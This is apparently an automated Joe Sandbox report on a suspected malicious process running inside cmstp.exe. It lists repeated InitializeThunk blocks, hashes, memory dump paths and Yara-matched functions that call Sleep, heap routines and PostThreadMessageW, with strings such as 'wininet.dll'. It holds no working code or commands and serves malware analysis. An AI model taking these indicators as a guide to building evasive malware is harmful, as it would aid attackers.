                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (graph rendering not recoverable from the extracted text; legend: Executed / Not Executed)
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 89d20f141097f912962c12f6c67f8e4e13333a788c201945565a7f0af1276ce3
                                          • Instruction ID: 5a19540ad1347d85e0205fc19009737b9f09d8c76c480406e1d6047dbd75f9ff
                                          • Opcode Fuzzy Hash: 89d20f141097f912962c12f6c67f8e4e13333a788c201945565a7f0af1276ce3
                                          • Instruction Fuzzy Hash: 4931B4B2600205AFCB24DFA8D885FABB7F8FB89700F108169EA1D5B246D771A550CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 1a71e6dc4dff4f472559d6feda0db4d663c70a74246b6585649c3cc6ab04cd34
                                          • Instruction ID: e547275dea6c71c025aca6996a32ac14f5f7b4fb6bd0223c8fc1a748b1492dca
                                          • Opcode Fuzzy Hash: 1a71e6dc4dff4f472559d6feda0db4d663c70a74246b6585649c3cc6ab04cd34
                                          • Instruction Fuzzy Hash: 313181B6600745BBC724DFA4C885FA7B7F8BB89B01F10841DF62A5B246DB70A550CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                          APIs
                                          • RtlAllocateHeap.NTDLL(&E,?,000A4C9F,000A4C9F,?,000A4526,?,?,?,?,?,00000000,00000000,?), ref: 000AA61D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: &E
                                          • API String ID: 1279760036-2925179166
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 4ac05c39e2d3972d2d70cc473dc600fabf2bfdd42aefaf4d98bcbb78c6f2878c
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 20E012B2200208ABDB18EF99DC41EE777ACAF88654F118558BA085B282C630F914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA65D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: 5e5836bea2ede1412439be4b8e1d8a618688e6f4e511855f0301eaa5aec8da97
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 40E01AB12002046BD718DF99DC45EE777ACAF88750F014554B90857242D630E914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 25d073b2bc6f21cadc9bcad80a3e92cefb8248710b66ae470d3de3b195a8fe42
                                          • Instruction ID: b1415845bb2c15092ea0df81228b55cb16e75bf82f839d937fcd01a33f143d54
                                          • Opcode Fuzzy Hash: 25d073b2bc6f21cadc9bcad80a3e92cefb8248710b66ae470d3de3b195a8fe42
                                          • Instruction Fuzzy Hash: 45018871A8031877EB20A6949C43FFE776C6F41B50F054114FF04BA2C2E7E46A0547E6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                          • Instruction ID: ced5e8d80e33feea0380355814cacd8b7b87fbc68f25bb1e9ce4e5a58f50b5ff
                                          • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                          • Instruction Fuzzy Hash: 1F01A771A8022877EB20A6949C03FFE776C6B41F50F054114FF04BA1C2E6D46A0547F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
